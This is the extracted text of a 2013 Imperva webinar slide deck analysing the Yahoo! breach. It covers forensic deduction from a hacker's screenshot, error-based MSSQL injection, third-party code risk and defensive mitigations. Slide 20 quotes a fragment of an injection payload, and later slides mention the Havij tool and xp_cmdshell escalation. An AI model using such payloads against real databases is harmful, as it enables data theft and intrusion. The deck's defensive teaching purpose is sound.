More Related Content Similar to Lessons Learned From the Yahoo! Hack (20) Lessons Learned From the Yahoo! Hack1. Lessons Learned From the Yahoo! Hack
Amichai Shulman, CTO
© 2013 Imperva, Inc. All rights reserved.
2. Agenda
Finding the vulnerable Yahoo! app
+ A true cyber detective story
Yahoo! hack technical analysis
+ SQL Injection
+ Error based SQL Injection
The greater lesson
+ 3rd party code security
Summary and Conclusions
2 © 2013 Imperva, Inc. All rights reserved.
3. Amichai Shulman – CTO Imperva
Speaker at Industry Events
+ RSA, Sybase Techwave, Info Security UK, Black Hat
Lecturer on Info Security
+ Technion - Israel Institute of Technology
Former security consultant to banks & financial
services firms
Leads the Application Defense Center (ADC)
+ Discovered over 20 commercial application vulnerabilities
– Credited by Oracle, MS-SQL, IBM and others
Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
© 2013 Imperva, Inc. All rights reserved.
5. Breaking News – Yahoo! Has been Hacked
5 © 2013 Imperva, Inc. All rights reserved.
6. Gathering Evidence
Hacker released a redacted screenshot of the allegedly
hacked Yahoo! app
6 © 2013 Imperva, Inc. All rights reserved.
7. Forensics – Turning Evidence into Insights (1)
Host name from address bar:
+ Ends in “yle.yahoo.net”, (not “yahoo.com”)
+ It has a relatively long host name
7 © 2013 Imperva, Inc. All rights reserved.
8. Forensics – Turning Evidence into Insights (2)
Error message
+ The application is powered by ASP.NET
– Most Yahoo! Applications are PHP based
+ Application source file resides on C:webcorp[blackened by
hacker]pYahooV2app_code
8 © 2013 Imperva, Inc. All rights reserved.
9. Identifying the Vulnerable Yahoo! App (1)
Host name from address bar:
+ Ends in “yle.yahoo.net”, (not “yahoo.com”)
+ It has a relatively long host name.
9 © 2013 Imperva, Inc. All rights reserved.
10. Identifying the Vulnerable Yahoo! App (1)
Host name from address bar:
+ Ends in “yle.yahoo.net”, (not “yahoo.com”)
+ It has a relatively long host name.
10 © 2013 Imperva, Inc. All rights reserved.
11. Identifying the Vulnerable Yahoo! App (2)
Error message
+ The application is powered by ASP.NET (not PHP like most
Yahoo! Applications)
+ Application source file resides on C:webcorp[blackened by
hacker]pYahooV2app_code
11 © 2013 Imperva, Inc. All rights reserved.
12. Identifying the Vulnerable Yahoo! App (2)
Error message
+ The application is powered by ASP.NET (not PHP like most
Yahoo! Applications)
+ Application source file resides on C:webcorp[blackened by
hacker]pYahooV2app_code
12 © 2013 Imperva, Inc. All rights reserved.
13. Yahoo! Hack Technical Analysis
Error Based SQL Injection
13 © 2013 Imperva, Inc. All rights reserved.
14. Data Extraction Techniques by Hackers: 2005-2011
Other
17%
SQL Injection
83%
Total = 315,424,147 records
(856 breaches)
Source: Privacy Rights Clearinghouse
14 © 2013 Imperva, Inc. All rights reserved.
16. SQL Injection: Technical Impact
Retrieve sensitive data
from the organization
Steal the site’s
administrator password
Lead to the downloading
of malware
16 © 2013 Imperva, Inc. All rights reserved.
17. Still A Very Relevant Attack
On average, we have identified 53 SQLi
attacks per hour and 1,093 attacks per day.
© 2013 Imperva, Inc. All rights reserved.
18. SQL Injections By the Hour – Highly Automated
18 © 2013 Imperva, Inc. All rights reserved.
20. Yahoo! Hack – MSSQL Injection with Conversion
Errors
Attack vector:
+ ' and 1 = convert (int,(select top 1 table_name from x).
The server tries to convert the additional data (in this
case the table name) to integer
Character strings cannot be converted into integer, thus
an error is triggered
If a system is not hardened, the error message is visible
to the attacker, revealing the data
20 © 2013 Imperva, Inc. All rights reserved.
21. MSSQL Injection with Conversion Errors
No need to be a hacker to exploit
Even script kiddies can do it with automated exploit tools
+ Havij
21 © 2013 Imperva, Inc. All rights reserved.
22. From SQL Injection to Command Execution
In case of SQL injection in MSSQL DB, attacker can
leverage it to run arbitrary commands using the
“XP_CMDSHELL” system stored procedure
Supported by exploit tools
22 © 2013 Imperva, Inc. All rights reserved.
23. 3rd Party Code Security
23 © 2013 Imperva, Inc. All rights reserved.
24. Vulnerable Application is a 3rd Party Application
“The leading astrology portal in India… formed co-
branded channel alliances with internationally recognized
brands such as MSN, Yahoo! and Google”
24 © 2013 Imperva, Inc. All rights reserved.
25. Vulnerable Application is Hosted by 3rd Party
Routing of users from Yahoo! to Astroyogi.com with a DNS
alias
“in.horoscopes.lifestyle.yahoo.net”“yahoo.astroyogi.com”
25 © 2013 Imperva, Inc. All rights reserved.
26. You Don’t Own the Code of All Your Applications
Yahoo! is not alone
3rd party applications are embedded as code or by
hosting by many organizations
28% of Veracode assessed applications are identified as
created by a 3rd party
26 © 2013 Imperva, Inc. All rights reserved.
27. You Don’t Even Own All the Code of YOUR
Applications
Even homegrown applications are mostly comprised of
3rd party code
According to Veracode:
+ “Up to 70% of internally developed code originates outside of
the development team”
27 © 2013 Imperva, Inc. All rights reserved.
28. Third Party Code Related Breaches
28 © 2013 Imperva, Inc. All rights reserved.
31. SQL Injection
Mitigation Checklist
31 © 2013 Imperva, Inc. All rights reserved.
32. Step 1: Use a WAF to Detect SQL Injection
Positives
+ Can block many attacks
+ Relatively easy
Negatives
+ Can become a crutch
+ Potential for false positives
32 © 2013 Imperva, Inc. All rights reserved.
33. Step 2: Deploy Reputation Based Solution
Positives
+ Blocks up to 40% of attack
traffic
+ Easy
Negatives
+ Does not deal with the
underlying problem
33 © 2013 Imperva, Inc. All rights reserved.
34. Step 3: Stop Automated Attack Tools
Positives
+ Detects automated tool
fingerprints to block attacks
+ Relatively easy
Negatives
+ Potential for false positives
© 2013 Imperva, Inc. All rights reserved.
35. Step 4: WAF + Vulnerability Scanner
“Security No-Brainer #9:
Application Vulnerability Scanners
Should Communicate with
Application Firewalls”
—Neil MacDonald, Gartner
Source: http://blogs.gartner.com/neil_macdonald/2009/08/19/security-no-brainer-9-application-vulnerability-scanners-should-
communicate-with-application-firewalls/
35 © 2013 Imperva, Inc. All rights reserved.
36. 3 rdParty Code
Mitigation Checklist
36 © 2013 Imperva, Inc. All rights reserved.
37. Technical Level Recommendations
Assume third-party code – coming from partners,
vendors, or mergers and acquisitions – contains
serious vulnerabilities
Pen test before deployment to identify these issues
Deploy the application behind a WAF to
+ Virtually patch pen test findings
+ Mitigate new risks (unknown on the pen test time)
+ Mitigate issues the pen tester missed
+ Use cloud WAF for remotely hosted applications
Virtually patch newly discovered CVEs
+ Requires a robust security update service
37 © 2013 Imperva, Inc. All rights reserved.
38. Webinar Materials
Join Imperva LinkedIn Group,
Imperva Data Security Direct, for…
Answers to
Post-Webinar
Attendee
Discussions
Questions
Webinar
Join Group
Recording Link
© 2013 Imperva, Inc. All rights reserved.